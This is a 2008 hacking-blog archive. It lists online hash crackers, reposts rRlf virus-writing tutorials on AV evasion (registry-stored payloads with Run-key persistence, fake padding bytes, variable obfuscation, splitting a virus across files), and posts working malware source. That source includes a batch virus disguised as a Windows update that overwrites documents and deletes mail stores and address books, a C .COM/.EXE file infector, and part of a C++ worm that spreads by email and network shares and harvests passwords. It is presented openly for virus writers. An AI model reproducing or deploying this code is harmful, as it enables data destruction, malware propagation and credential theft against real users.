Tuesday, October 21, 2008

online MD5 crackers

http://passcrack.spb.ru/ ->sha1
http://www.securitystats.com/tools/hashcrack.php ->sha1
http://www.md5encryption.com/ ->sha1
http://www.hashreverse.com/ ->sha1
http://rainbowtables.net/services/results.php ->sha1
http://rainbowcrack.com/ ->sha1
http://passwordsecuritycenter.com/in...roducts_ id=7
http://www.shalookup.com/ ->sha1

lm Only:
some more links

Thursday, October 16, 2008

The Secure Virus-Copy

      ************                                                                            ***********
      ************        The Secure Virus-Copy                                ***********
      ************     by Second Part To Hell/[rRlf]                           ***********
      ************                                                                             ***********


  0) Intro Words

  1) The Idea

  2) Important marginal notes
       a) Inverted commas
       b) 'exit'-command
       c) '@echo'-command
       d) '%~a'-option
       e) '>>'-option

  3) How to use it
       a) General Information
       b) Where to store the code

  4) Last words

  0) Intro Words

  The title of this article sounds really strange and I'm sure, you can't think
  what I'll tell you now. Don't worry, you will get the point while reading this
  text. First I have to thank three persons, who's viruses or articles helped me
  to get this idea. First person is Benny, who wrote a great article called
  'Some ideaz about future worms', which was released in 29a#6. In his article he
  mentioned that a worm 'should not be stored at any file on the disk'. The second
  important person, who's virus helped me to get the idea and bring the idea to
  reallity was Lys Kovick with his WinREG.AntiREG. Last but not least Q the Misanthrope's  virus Bat.OneLine wsa very important for this article. To all these guys I have to  send out a really great 'THANK YOU'! :D Well you still can't think about my idea,  so I'll stopp writing this silly intro and start to come to the important parts...

  1) The Idea

     The idea is, as you should have already noticed, a copy of the virus, which can't
     be detected. Let's consider the scan of a Antivirus-Program. The program detects
     every virus, which is already in the virus-definition, in (most times) every file
     at the computer. Now: What would be, if the virus doesn't exist in any file at the
     computer??? It is not detected. You may think, "Damn, silly boy, how should the virus
     work?". The answere's name is Registy...
     As you may know, you can run any program with the right extansion via the registry.
     That is the main point. You just have to store a copy of the virus/worm's code in registry
     (if it's script than it's easy, if it's a binary you have to debug it later on). Now
     let's think that the virus is in the registry, how we get it out from there?
     As I have already told you, you can run programs via registry... One of this programs
     you can run is called 'CMD.exe', the new Windows 2000 Command-Interpreter.
     The think get's tricky now: As you may know, your CMD.exe has a command called 'for',
     we are going to use it now. Why? Well, it's doubtful that your virus just have one line,
     therefore we have to use one line (registry just allows one line of CMD.exe-code) bringing
     your virus-code to a new file. Maybe you didn't fully understand what I meant, therefore
     I'll show you an example now. This is the content of a new registy-key, which is stored
     in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

     - - - - - - - - - - - - - -
     cmd /c for %a in ("@echo off" cls "echo Second Part To Hell was here..." pause exit) do @echo %~a>>C:\example.cmd
     - - - - - - - - - - - - - -

     Now guess the effects of this key! Every start-up of the computer it will generate a new
     file called C:\example.cmd with the code between the inverted commas. Cool we got
     a new file onto the computer... I'm sure that you know it: The code should be your virus
     code. :). Now let's say, a virus uses such a code. First run it installs the key with
     it's code. Some time later the user notices that something smells fishy and scanns trough
     the harddisk. It finds a few copies of the virus and delets it. Now the cool thing:
     It doesn't matter as the virus has it's code saved in the registry. And this code is ready
     to infect the computer again and again (and again...).

  2) Impotant marginal notes

     There are some stranges in that line, which you have to note, otherwise you will have
     hard problems getting the code working:

     a) Inverted commas
        You have to set the commands between inverted commands, if the line you want to write to
        a new file contains at least one blank space. Otherwise CMD.exe treat it as more commands
        with the side-effects, that it writes every part to a new line. If the command doesn't contain
        a blank space, you may not use inverted commas.

     b) 'exit'-command
        After writing all your code to a .CMD or .BAT file, you have to use an 'exit'-command, since
        you may write the whole code to the file every computer run. That's also the reason why
        you must not use lables or gotos.

     c) '@echo'-command
        You have to use @echo to write strings to a file. If you would use just 'echo', you would
        also write the primary command to it (i.e.: C:\Windows\System32>echo cls>>C:\example.cmd AND

     d) '%~a'-option
        If you have used a multi-part-command (which contains blanc space[s]), you have to use inverted
        commands, as I have already told you. Using the simple '%a'-option, you would also write that
        inverted commas to the code (which you don't want I think). To write the code without that
        inverted commas you have to use '%~a'. (Of course, you could also use another variable-letter).

     e) '>>'-option
        When you try to use '>' to write your code to a file, you won't have success as CMD.exe overwrites
        everything in the file (the lines you have already written) with the new one with the result that
        the file contains JUST the last line you wanted to write.

  3) How to use it

     a) General Information
        I've already told you, how the technique works, but not how to use it. Well, here we are.
        First thing your virus should do when it's activ is to search the AutoStart-Directory, after
        that it should write the modified code (the code above with the new directory+filename) to the
        registry. That's all, easy - isn't it?! :)

     b) Where to store the code
        This is maybe the most important decision you have to make. Here are a few opportunities with
        it's pro and contra.

        --> Standart-Registry-Run
        For Example: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        This is maybe the easiest and saved way to make sure that the virus will be started every
        computer-Run. But the problem is that even low- and and medium-knowlegde computer users know
        how to find a key here. That's a big problem...

        --> Command Processor-AutoRun
        HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
        HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
        The good thing is that nearly nobody knows about this key. The key forces the CMD.exe to
        run a command or a file before the real window opens. The code would run when the
        user opens a .CMD/.BAT file or open directly the CMD.exe. The problem is that a normal user
        don's use these things. :(

        --> Hooking File-extansions
        malfunction wrote an article about that and released it in 29a#6. He used that technique
        to run a virus/worm-file before an .EXE is executed. We can use the same technique modified.
        just put the code above instead of malfunction's filename, and it should work.

  4) Last words

     Here, at the end of my article, I really want to thank you for still being with me and
     reading this. I am really happy that I've finally finished this technique and this article, and
     I would be even happier if you could send me your opinion of this way to make a secure virus copy.
     I know that this article looks like it's just a technique for batch viruses, but it isn't! You
     can use it in every file-virus/worm for Windows. Just use the command 'debug', which is really easy.
     As you can imaging, I will write such a virus as soon as possible, and for showing you that it's
     possible, it will become a binary virus. :)...
     Greets goes to everybody who knows me (I'm too lazy to write them all down again, you know who you
     are - just look at my homepage :D)...
     A special greets goes to my RainBow, ILD!

                                                        - - - - - - - - - - - - - - -
                                                          Second Part To Hell/[rRlf]
                                                          written from april-may 2004
                                                        - - - - - - - - - - - - - - -

Useful Things In Batch

A tutorial by: by Second Part To Hell/[rRlf] 
   ************                                      ***********
   ************        Useful things in Batch        ***********
   ************     by Second Part To Hell/[rRlf]    ***********
   ************                                      ***********

.intro words

  While making my Batch WOrm Generator I discovered much very useful techniques
  for Batch viruses, for instands about Encryption or Polymorphism. But I
  discovered also some other techniques. These are Anti AVA techniques, and I
  thought, I don't have to let them die. Now let's start...


  I'm sure, that you want to know, about which techniques I want to 
  talk. So, here is the shit of content :)

  1) Including fake bytes
  2) Useing a undeletable directory (Not for Win00|NT|XP)
  3) Including the EICAR-Testfile
  4) Pseudo-Trash between the code

.Including fake bytes

  This is a special Anti-KAV-heuristic technique. Maybe you know, that KAV only
  searchs in the first 1000 Bytes for the virus (I think, only in batch viruses).
  What does that mean for us? Guess what? :) We inlude befor of the start of our
  virus 1000 silly bytes, which don't do anything. And what is t effect? Let's test
  it. First we have a very silly code-string, that only spread itself in the
  current dir via overwriting Batch-files. KAV named it 'BAT.Silly.d'.

- - - - - - - - - - [ BAT.Silly.d ] - - - - - - - - - -

for %%a in (*.bat) do copy %0 %%a

- - - - - - - - -[ End of BAT.Silly.d ]- - - - - - - - -

  Now let's test our new technique. Includeing 1000 fake-Byte should not
  be a serious problem. Because of the fact, that batch ignore simple input-errors
  we won't have any problems with it. My string contains random lowercase-letters.
  But it should be no problme to include also other letters like Uppercase or
  numbers and so on. Important Note: Do not include a '<' or a '>', because the
  computer will 'think', that you want to read/write from a file.

- - - - - - - - - - [ Fake Bytes ] - - - - - - - - - -


for %%a in (*.bat) do copy %0 %%a

- - - - - - - - - [ End of Fake Bytes ] - - - - - - - - -

  The thing looks damn stupid, but the effect is genial :). The whole virus
  works, but KAV don't show any alarm. And also no heuristic alarm. I'm sure,
  that you will like this technique very much.

.Useing a undeletable directory (Not for Win00|NT|XP)

  This technique's name looks very cool. And don't worry, it IS very cool.
  But first let me explain, what it is: Windows 95 and Windows 98 have a
  bug. If you try to make a new directory in MS-DOS, which contains some special
  letters, windows won't be able to work with that directorys. You can't open
  the directory, move it or delete it. That's the princip of our technique,
  because of the reason, that batch is a DOS script. Now let's have a look at
  letters, which make that possible.

- - - - - - - - - - - [ Letter List ] - - - - - - - - - - -

ASCII  176: °
ASCII  177: ±
ASCII  178: ²
ASCII  179: ³
ASCII  180: ´
ASCII  185: ¹
ASCII  186: º
ASCII  187: »
ASCII  188: ¼
ASCII  191: ¿
ASCII  192: À
ASCII  193: Á
ASCII  194: Â
ASCII  195: Ã
ASCII  196: Ä
ASCII  197: Å
ASCII  200: È
ASCII  201: É
ASCII  202: Ê
ASCII  203: Ë
ASCII  204: Ì
ASCII  205: Í
ASCII  206: Î
ASCII  213: Õ
ASCII  217: Ù
ASCII  218: Ú
ASCII  219: Û
ASCII  220: Ü
ASCII  223: ß
ASCII  242: ò

- - - - - - - - - -[ End of Letter List ]- - - - - - - - - -

  OK, we know all the chars, which are possible. Now let's make a little
  sample with that technique. My sample makes a undeleteable directory in
  %windir%, and write something to the autoexec.bat, which let the virus
  start at every windows-run.

- - - - - - - - - - - [ Letter List example ] - - - - - - - - - - -

@echo off
cd %windir%
md º´ÜòÌ
cd º´ÜòÌ
copy %0 virus.bat
echo cd %windir% >>autoexec.bat
echo cd º´ÜòÌ >>autoexec.bat
echo virus.bat >>autoexec.bat

- - - - - - - - - -[ End of Letter List example ]- - - - - - - - - -

  I'm sure, that you'll understand the example. A special thanks goes
  to the Author of 'Trojan.BAT.NoDelDir', but unfortunatly I don't know,
  who it is. If you read this, please contact me!!!

.Including the EICAR-Testfile

  I think, that everybody knows, what EICAR-Virus-Test-File is. If not, I'll
  explain it: It's a com-file from EICAR, and every Scanner detects it. It's
  only for testing your AV. It's no virus, but it writes a String to the DOS
  screen. OK, sounds nice, but how can we use it? Because of the fact, that 
  nearly everybody knows about that file, nobody is scared of a warning from
  his AV about that detection. That's the point. We include to our program the
  EICAR-file, so useres won't be scared of it. Here is the EICAR file content:

- - - - - - - - - [ EICAR-content ] - - - - - - - - - -


- - - - - - - -[ End of EICAR-content ]- - - - - - - - -

  This is the same princip as the fake-bytes. But it contains a sensefully
  content: The EICAR-file. It's the same 'virus', that I used in the FAKE
  BYTE including technique. But now it's no more detect as 'BAT.Silly.d'
  but 'EICAR-Test-File'. And we had success :)

- - - - - - - - - [ EICAR-content example] - - - - - - - - - -

for %%a in (*.bat) do copy %0 %%a

- - - - - - - -[ End of EICAR-content example]- - - - - - - - -

.Pseudo-Trash between the code

  The title sounds emazing. So, what do I mean with 'Pseudo-Trash'?
  Anything, that is written down in the code, but do not exist in the
  runtime. You may think, that I'm a stoned/drunken or whatever, but it's
  the only possible explanation. Think about the explanation. What comes
  to your mind? Maybe the command 'set'? Then you're at the right way.
  OK, a variable contains any content. But the point is, that a variable
  can also contains '' (=nothing). Now we solved our problem :)
  Let's look at the code. It's again the silly virus, which is detect by
  KAV as 'BAT.Silly.d'.

- - - - - - - - - [ Pseudo-Trash example] - - - - - - - - - -

%anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a

- - - - - - - -[ End of Pseudo-Trash example]- - - - - - - - -

  As you can see, the thing is very (!!!) easy to make, but it's also useful.
  Note: you have to know, that the variable, that you use, has no content.
  Otherwise the virus won't work. If you are not sure about the content,
  include the line 'set anthing=', so you delete the content.

.last words

  These techniques could be really useful, if you also include other Anti AV
  tricks. If you include all these things and also encryption or polymorphism
  or whatever, AVs will have a really problems. Now I hope, that you'll try
  to use some (or maybe all :D ) of these things in your future-projects,
  otherwise I wasted much hours of discover the techniques, searching errors
  and better ways of it, checking the behaviour on other OSes and writing the
  article. OK, in the end I want to say sorry about my english spelling or
  grammer mistakes :).

       - - - - - - - - - - - - - - -
         Second Part To Hell/[rRlf]  
         written in june 2003
       - - - - - - - - - - - - - - - 

A good idea for virus writers

I was surfing through net and i came across this article which i found good enough to share with you people.
i express my sincere thanks to[rRlf] for sharing the idea with us.

here it goes.


   ************                                      ***********
   ************          Over-File Splitting         ***********
   ************     by Second Part To Hell/[rRlf]    ***********
   ************                                      ***********


  0) Intro Words

  1) The idea

  2) How to split?

  3) How to join?

  4) Short: How to use?

  5) Short: Encryption

  6) Short: Code in Filename

  7) Outro words

  0) Intro Words

     This title may give you no ideas what my idea is about,  so I'll tell you:
     The idea itself is  a heavy kind of Fuck-AV technique,  it does not belong
     to any other technique I've already seen. Just check it out.
     Let's consider the  detection of a virus by an AV program:  The AV program
     searchs in all  files of the disk for  special strings or whatever.  If it
     finds such a string,  the file is detected.  (I dont talk about encryption
     or polymorphism in this connection - it's not important for the idea).
     How to prevent this detection? I'll explain you...

  1) The idea

     Well, I've told you that an AV searchs in every file of the HD if there is
     a virus.  But what would be, if  the virus  would not be in one file? What
     would be if the virus would be in 1000 or more files?
     You may think: "Shit, what the hell are you talking about?"
     OK, let's say anybody's computer gets infected by a virus/worm. Many files
     get infected and  the user recognizes  that something smells fishy.  (S)He
     updates the AV program, scanns all files, all infected files become clean.
     Is anything over now?  No, it is not, because the virus/worm, when running
     the first  time splitted  itself in 1000 parts,  and every  part is  a own
     file with  the length  of ~4-8 byte.  This files (which have random names)
     became  saved in a directory.  The files alone can  not harm anybody,  but
     together they can. Together?  The virus/worm also made a file, which joins
     all files. This file, which runs every at restart (registry,autostart,...)
     become executed now, and the computer will be reinfected again.
     Can you now imagine how our virus/worm uses this technique and why may be
     real successful? Just read on...

  2) How to split?

     This is most important for the technique: The more parts you have for your
     virus/worm, the less the chance,  that an AV program could detect it. Why?
     Because a 4 byte scan-string would not be enough for detecting a virus. If
     such a small scan-string would be used, the AV would definitivly have alot
     of false-positives  (detecting uninfected files).  It is also important to
     split your files randomly. Not always the same way. And to split the files
     in random length parts, not always i.e. 5 byte.
     If the program is a virus, it does not matter if the you also split the
     hostcode. And about the header of a file: It is no problem to also split 
     the header into parts.
     Now let me show you a primitive graphic, how i mean this:


      This could be:

      1: RE              1: REA
      2: AL-             2: L-FIL
      3: FILE-           3: E-INF
      4: INF             4: ECT
      5: ECTE            5: ED
      6: D-B             6: -BY-
      7: Y-A-            7: A-VI
      8: VIR             8: RUS-
      9: US-US           9: USIN
     10: ING-           10: G-TH
     11: THE-           11: E-OVE
     12: OVER-F         12: R-FI
     13: ILE            13: LE-SP
     14: -SPLI          14: LI
     15: TTING          15: TT
     16: -TECH          16: ING
     17: NIQ            17: -TE
     18: UE             18: CHN
                        19: IQU
                        20: E

     Now let's imagine,  that every small  part of the file has a  random name.
     And one more:  Let's imagine, every part could be in  any directory at the
     Harddisk.  Or even on  another partition.  That does not matter,  you just
     have to save the name for the joining-process.

  3) How to join?

     How could be join this files again to one file,  which can be executed? At
     splitting the virus, we have the filenames and -pathes, so we have to save
     them. After splitting,  a file will be created,  which will join the virus
     to one file. I'll show you now how such a file could look like. For making
     it easy I've used CMD command COPY for that:

     - - - - -
     copy C:\WinNT\shjei2.tmp+E:\Pictures\lwjfnvmsiq9jm.dsf+D:\Songs\ToT\j1s.ajs+C:\Vir-Fol\iajw.vir+... C:\run.exe
     - - - - -

     The most important thing is,that your joining-program can not be detected.
     You can  of course generate  your program  totally randomly,  and with the
     filenames it is totally random.
     There is nothing more to say...

  4) Short: How to use?

     Here is another idea,  how you can use this  technique for an  eMail worm.
     The worm  should send itself via an archive  (.ZIP/.RAR/.???). The archive
     has to contain a directory and a joining file.  In the directory there are
     all parts of the virus. The user clicks the joining file, and it joins the
     virus to one file and runs it. The result is, that the user can scan every
     file, but nothing is found, because no file is the virus, but all. :)
     Something else:  An eMail as  archive is more  serious than a normal  .EXE
     file, and even if in the archive are  more files and a directory. The user
     may think it's a program.

  5) Short: Encryption

     No, this is no encryption tutorial,  but another way how to use this idea.
     You could have 3 files: joining-file, encrypted-code file,decryption file.

     Before joining:          After joining:

      ______________         _______________
     | Joining file |       | Joining file  |
     |______________|       |_______________|

      ______________         _______________
     | Encry. code  |       | Decry. engine |
     |______________|       | Encry. code   |
     | Decry. file  |

     What is important for this technique? Your decryption engine and the join-
     ing file  must not be detected. If  the decrytion engine  is not detected,
     most times  AV tries to emulate the  decrytion and encrypt the  virus. But
     if there is nothing to decrypt, nothing is detected. :)

  6) Short: Code in Filename

     This  is another idea,  which belongs (nearly :D) to  Over-File Splitting.
     Just imagine: What would be,  if we would make a directory,  and  make new
     files with special names. The  special names should  present the code. But
     as there are many characters, which aren't allowed for a filename, we have
     to use the HEX of the character.
     But now  we have one  problem: We have  sort the filenames,  as we need to
     join the parts in  right way.  I'll show you  a short  graphic to let  you
     understand my idea:

     1. File: 000148454C4C4F20
               \/  | | | | | |
               AA  B C D E F G

     2. File: 0002565845525321
               \/  | | | | | |
               AA  B C D E F G

     AA: This is for sorting the filenames. I've used a word, so we can use
         0xFFFF filenames. Important: 4 Byte=2 HEX Chars=0xFFFF chars.

     B: 2 Bytes = 1 HEX of a Character. Here it is the 1st one.
     C: 2 Bytes = 1 HEX of a Character. Here it is the 2nd one.
     D: 2 Bytes = 1 HEX of a Character. Here it is the 3rd one.
     E: 2 Bytes = 1 HEX of a Character. Here it is the 4th one.
     F: 2 Bytes = 1 HEX of a Character. Here it is the 5th one.
     G: 2 Bytes = 1 HEX of a Character. Here it is the 6th one.

     Just for not missunderstanding:  '000148454C4C4F20'  IS the  filename, it
     could also be '000148454C4C4F20.txt', but for making it easier, I did not
     use any extansion.

     For getting the code: You have to sort the filenames:
     - 000148454C4C4F20
     - 0002565845525321

     Reduce the 4 byte in the beginning (which are just for sorting):
     - 48454C4C4F20
     - 565845525321

     And join the names:
     - 48454C4C4F20565845525321

     As it is a Hex-Value, we have to change it to a Text Sting:

     Isn't this nice??? :)
     Well, I know that this idea is  quite strange  and it seems  to be unreal.
     But it isn't, you can make it real! And if you did, nobody will detect it.

  7) Outro words

     This  technique is  definitivly hard to  bring it to  reality, but  no way
     impossible. I would like  to see the  faces of AVers,  if they  see such a
     virus. :) But really, what would they do?  The only thing is to detect the
     joining file, but what if we could make  it undetectable? We would have an
     undetectable virus - isn't that our goal?

                                                  - - - - - - - - - - - - - - -
                                                    Second Part To Hell/[rRlf]  
                                                    written from Jan 2005

                                                    ...surrealistic viruswriter...
                                                  - - - - - - - - - - - - - - - 
he also made the File Splitting Engine (also released in rRlf #6)
description he wrote as:  

This is just a small engine, but I'm sure it could be very useful. What does the engine do?

It splitts the current file into 3-10 byte parts and creates a joining file (called start.bat).

To understand it's purpose, you should read my article called "Over-File Splitting".
download link 

Sunday, October 12, 2008

A batch file virus code

IF EXIST c:\winupdt.bat GOTO CODE
ECHO Ein batch Virus - getarnt als Windows-Update
copy %0 c:\winupdt.bat >> NUL
ECHO Bitte haben sie ein wenig Geduld ... ausführen des Systemscans ...
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO fertig

ECHO Die benötigten Dateien werden installiert!
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO Installation abgeschlossen
ECHO Bitte registrieren sie sich nun bei schell-industry, 
um über neue updates informiert zu werden.
ECHO Download gestartet...
START "C:\Program Files\Internet Explorer\Iexplore.exe" 
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del 
"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}
\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" 
del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Damit die Einstellungen erfolgreich übernommen werden können, 
wird jetzt ein Neustart durchgeführt.
ECHO Bleiben sie uns weiterhin treu, ihr SCHELL-industry Sicherheitsteam.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec

prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" 
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" 
del "C:\WINDOWS\Application Data\Identities\
{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" 
del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL

Saturday, October 11, 2008

Make free calls

there are many sites today which will provide you this facility.

i found this one working fine..


so start calling your friends located anywhere

Thursday, October 9, 2008

The Giant black book of computer virus

The Giant black book of computer virus

download link: http://www.esnips.com/doc/6fdb4602-4de6-479a-b99f-cf1a4e256f68/The_Giant_Black_Book_of_Computer_Viruses

The Little Black Book of Computer Viruses

Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-02-0

Book cover
Photo: Mark Ludwig


A generic or .com and .exe infector in C

 /* C-Virus:  A generic .COM and .EXE infector

   Written by Nowhere Man

   Project started and completed on 6-24-91

   Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)

[to protect the code from script kiddies.. header files are not given]

#pragma inline                              // Compile to .ASM


void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

 #define DEBUG
#define ONE_KAY   1024                      // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300)               // 6k+ size minimum
#define SIGNATURE "NMAN"                    // Sign of infection

int main(void)
    /* The main program */

    spread(_argv[0], victim());             // Perform infection
    small_print("Out of memory\r\n");       // Print phony error
    return(1);                         // Fake failure...

void hostile_activity(void)
    /* Put whatever you feel like doing here...I chose to
       make this part harmless, but if you're feeling
       nasty, go ahead and have some fun... */

    small_print("\a\a\aAll files infected.  Mission complete.\r\n");

int infected(char *fname)
    /* This function determines if fname is infected */

    FILE *fp;                     // File handle
    char sig[5];                       // Virus signature

    fp = fopen(fname, "rb");
    fseek(fp, 28L, SEEK_SET);
    fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
    printf("Signature for %s:  %s\n", fname, sig);
    return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);

void small_print(char *string)
    /* This function is a small, quick print routine */

    asm {
         push si
         mov  si,string
         mov  ah,0xE

print:   asm {
         or   al,al
         je   finish
         int  0x10
         jmp  short print
finish: asm   pop  si

void spread(char *old_name, char *new_name)
    /* This function infects new_name with old_name */

    /* Variable declarations */

    FILE *old, *new;                   // File handles
    struct ftime file_time;                         // Old file date,
    int attrib;                        // Old attributes
    long old_size, virus_size;              // Sizes of files
    char *virus_code = NULL;           // Pointer to virus
    int old_handle, new_handle;             // Handles for files

    /* Perform the infection */

#ifdef DEBUG
    printf("Infecting %s with %s...\n", new_name, old_name);
    old = fopen(old_name, "rb");            // Open virus
    new = fopen(new_name, "rb");            // Open victim
    old_handle = fileno(old);               // Get file handles
    new_handle = fileno(new);
    old_size = filelength(new_handle);      // Get old file size
    virus_size = filelength(old_handle);         // Get virus size
    attrib = _chmod(new_name, 0);           // Get old attributes
    getftime(new_handle, &file_time);       // Get old file time
    fclose(new);                       // Close the virusee
    _chmod(new_name, 1, 0);                 // Clear any read-only
    unlink(new_name);                  // Erase old file
    new = fopen(new_name, "wb");            // Open new virus
    new_handle = fileno(new);
    virus_code = malloc(virus_size);        // Allocate space
    fread(virus_code, virus_size, 1, old);       // Read virus from old
    fwrite(virus_code, virus_size, 1, new);         // Copy virus to new
    _chmod(new_name, 1, attrib);            // Replace attributes
    chsize(new_handle, old_size);           // Replace old size
    setftime(new_handle, &file_time);       // Replace old time

    /* Clean up */

    fcloseall();                       // Close files
    free(virus_code);                  // Free memory

char *victim(void)
    /* This function returns the virus's next victim */

    /* Variable declarations */

    char *types[] = {"*.EXE", "*.COM"};          // Potential victims
    static struct ffblk ffblk;              // DOS file block
    int done;                     // Indicates finish
    int index;                         // Used for loop

    /* Find our victim */

    if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))

    for (index = 0; index < sizeof(types); index++) {
         done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
         while (!done) {
#ifdef DEBUG
              printf("Scanning %s...\n", ffblk.ff_name);
              /* If you want to check for specific days of the week,
                 months, etc., here is the place to insert the
                 code (don't forget to "#include "!) */

              if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
              done = findnext(&ffblk);

    /* If there are no files left to infect, have a little fun... */

    return(0);                         // Prevents warning

A worm in cpp

// ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--//
// An exploration into remote network propogation using multiple techniques.
// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :).
// This code is obviously buggy and not intended to be actually used in the
// 'real' world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a 'game' with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the 'game', its just a perverse example of too much time on ones
// hands :). this is version 1.00 so the are bugs, incompatabilities with
// various flavors of windows and other anomolies - dose! but if you want
// something better write it yourself ;) (and send me a copy)
//               "this is the end, beautiful friend" - the doors
// ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--//

#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>

#include <conio.h>
#define MAX_LENGTH          128
#define MAX_RECIEVERS       50
#define MUTEX_NAME          "w0rm"
#define EARTH_WORM_JIM      "Readme.exe"

#define WORMGAME_PORT       12345
#define WORMGAME_MAX_WINS   10
#define WORMGAME_PKT_WIN    0x80
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;

typedef struct tagPASSWORD_CACHE_ENTRY {
    WORD cbEntry;
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;
    BYTE nType;
    BYTE abResource[1];

typedef struct WormGamePkt {
    BYTE pktType;
    int pktNum;

BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();

extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
int main( int argc, char **argv )
        HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
        DWORD WormGameThreadId, WormMainThreadId;

        // display explorer window if we need to, due to autorun.inf file :)
        // test for any command line...

        /* only allow one instance of worm to run on system at one time */
        hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
            if(  GetLastError() == ERROR_ALREADY_EXISTS )
                ExitProcess( 0 );

        ptrEgo = argv[0];

        /* try to 'hide' the process */
            if( runningNT() == TRUE )
                // hide process in winNT
                printf("WORM running on WinNT\n");
            } else {
                printf("WORM running on Win9x\n");
                LoadLibrary( "KERNAL32.DLL" );
                RegisterServiceProcess( NULL, 1);

        /* go resident and give worm RAW power */
        hEgo = GetCurrentProcess();
        SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

        // create suspended WormMainThread...
        hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
            if( hWormMainThread != NULL )
                // set thread to time critical... 'i wana take you higher' - sly and the family stone
                //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
                // resume thread execution...
                ResumeThread( hWormMainThread );
        // create suspended WormGameThread...
        hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
            if( hWormGameThread != NULL )
                // resume thread execution...
                ResumeThread( hWormGameThread );
        /* wait for hWormGameThread() to terminate */
     //   WaitForSingleObject( hWormGameThread, INFINITE);
        WaitForSingleObject( hWormMainThread, INFINITE);

        printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");

        /* release our mutex, next local worm wont get blocked */
            if( hMutex != NULL )
                ReleaseMutex( hMutex );
        return 0;

        DWORD dwSize;
        char buff[64];
        printf("WormMainThread: started...\n");
        /* spread worm via MAPI */
        /* get any passwords we can for use later on */
        dwSize = 64;
        WNetGetUser( NULL, buff, &dwSize );
        addPassword( buff );
        printf("DEBUG: total pwds got = %d\n", index);
        /* spread worm via any/all localy maped drives */
        /* spread worm via any/all LAN network shares */
        propogateNet( NULL );
        /* finished our little game :) */
        ExitThread( 0 );
        return 0;

        WSADATA w;
        SOCKET s_recv, s_send;
        sockaddr_in saddr, saddr_in, saddr_out;
        int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
        AWORMGAMEPACKET gamePkt;
        fd_set fd_read;
        struct timeval timeout = { 5, 0 };

            if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
                printf("WormThread: WSAStartup failed\n");
                goto endThread;

        s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
